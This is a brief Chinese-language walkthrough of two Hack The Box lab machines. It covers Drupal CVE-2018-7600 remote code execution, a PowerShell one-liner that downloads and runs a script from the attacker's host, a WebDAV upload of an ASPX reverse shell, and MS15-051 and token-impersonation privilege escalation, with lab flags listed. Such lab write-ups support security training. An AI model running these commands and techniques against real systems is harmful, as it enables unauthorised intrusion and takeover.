HTB-oscplike-Bastard+Granny
Bastard
medium难度的bastard 靶机IP 10.10.10.9
sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
80看见 Powered by Drupal dirsearch扫出来changelog.txt 确定版本7.54
网上找到个好用的CVE-2018-7600直接可以rce
那就经典起个http 执行powershell -c “iex(new-object system.net.webclient).downloadstring(‘http://10.10.14.21:789/windowsshell.ps1’)”
拿到user的flag 64212fe194c2379dda8794d81c67434a
上传脚本扫提权洞 看见ms15-051可能可以
这里要注意只有连上来的目录有写权限 一旦顺手出去了就没权限拿东西过来了
用前两天的ms15-051 64位的弹回system 拿到flag
cea21849e111b1ea2f13debf2e6a36a1
Granny
easy难度的granny 靶机IP 10.10.10.15
sudo nmap -sS -sV -A -p- --min-rate=5000 -Pn 10.10.10.15
就个80 dirsearch扫了有aspnetclient 回过头发现80开了webdav
davtest --url http://10.10.10.15 发现txt文件是可以放上去执行的
那就msfvenom弄个aspx的shell 改成txt格式先
cadaver http://10.10.10.15 put asp.txt move cmdasp.txt asp.aspx
然后访问弹到nc
进去看到这台是2003的机器连powershell都没有 但是whoami /all发现了SeImpersonatePrivilege 那很明显可以劫持token提权
随便找个合适的脚本 msfvenom再弄个exe的shell kali开个smb服务
传个脚本过去执行我们的新shell 弹回system权限 打完
700c5dc163014e22b3e408f8703f67d1
aa4beed1c0584445ab463a6747bd06e9